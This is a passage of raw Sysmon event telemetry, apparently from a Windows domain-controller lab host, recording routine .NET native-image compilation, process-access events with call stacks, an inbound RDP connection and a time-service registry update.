13:45:07.501{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E3-6005-6901-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:07.376{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b04-0\System.Runtime.Serialization.dll2021-01-18 13:45:07.376 10341000x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:08.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:08.220{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:08.220{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localRDP2021-01-18 13:45:20.665{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse66.36.234.250-27189-false10.0.1.14win-dc-495.attackrange.local3389ms-wbt-server 13241300x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:45:23.595{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x2b982963) 11241100x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:23.532{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b1c-0\System.ServiceModel.dll2021-01-18 13:45:23.532 
10341000x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:22.562{59A5CD1D-8E56-6005-2E00-00000000A301}2464250.234.36.66.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.563{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:24.563{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90F4-6005-6B01-00000000A301}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.110{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90F4-6005-6B01-00000000A301}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.110{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90F4-6005-6B01-00000000A301}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:29.438{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:34.969{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1224-0\PresentationCore.dll2021-01-18 13:45:34.969 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:35.329{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90FF-6005-6D01-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:35.313{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90FF-6005-6D01-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:35.313{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90FF-6005-6D01-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:36.110{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:36.094{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:36.094{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SY